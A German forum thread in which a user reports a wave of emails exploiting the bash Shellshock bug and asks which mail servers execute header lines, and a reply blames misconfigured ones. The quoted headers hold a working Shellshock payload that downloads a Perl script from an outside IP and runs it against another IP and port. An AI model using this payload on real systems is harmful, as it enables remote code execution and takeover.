Shellshock per Mail

24/10/2014 - 13:18 von Erik Heinz | Report spam
Hallo Leute,

ich bekomme gerade dutzendweise Mails, die offenbar die jüngste
Sicherheitslücke der bash ausnützen wollen. Z.B. sowas:

Date: ) { :; }; wget 91.184.21.251/e.txt -O /tmp/e.txt;perl /tmp/e.txt
185.10.58.181 443;
From: {: ;;;, };, wget.91.184.21.251/e.txt.-O/tmp/e.txt;,
perl/tmp/e.txt.185.10.58.181.443;;;;;;
To: {: ;;;, };, wget.91.184.21.251/e.txt.-O/tmp/e.txt;,
perl/tmp/e.txt.185.10.58.181.443;;;;;;
Cc: {: ;;;, };, wget.91.184.21.251/e.txt.-O/tmp/e.txt;,
perl/tmp/e.txt.185.10.58.181.443;;;;;;
Subject: ) { :; }; wget 91.184.21.251/e.txt -O /tmp/e.txt;perl /tmp/e.txt
185.10.58.181 443;

Interessehalber: welche Mailserversoftware führt Headerzeilen per shell aus?

Gruß,
Erik
 

Lesen sie die antworten

#1 Kai Bojens
24/10/2014 - 13:40 | Warnen spam
Erik Heinz wrote:

Interessehalber: welche Mailserversoftware führt Headerzeilen per shell aus?



Fehlkonfigurierte zum Beispiel.

https://www.redteam-pentesting.de/d...-execution

Ähnliche fragen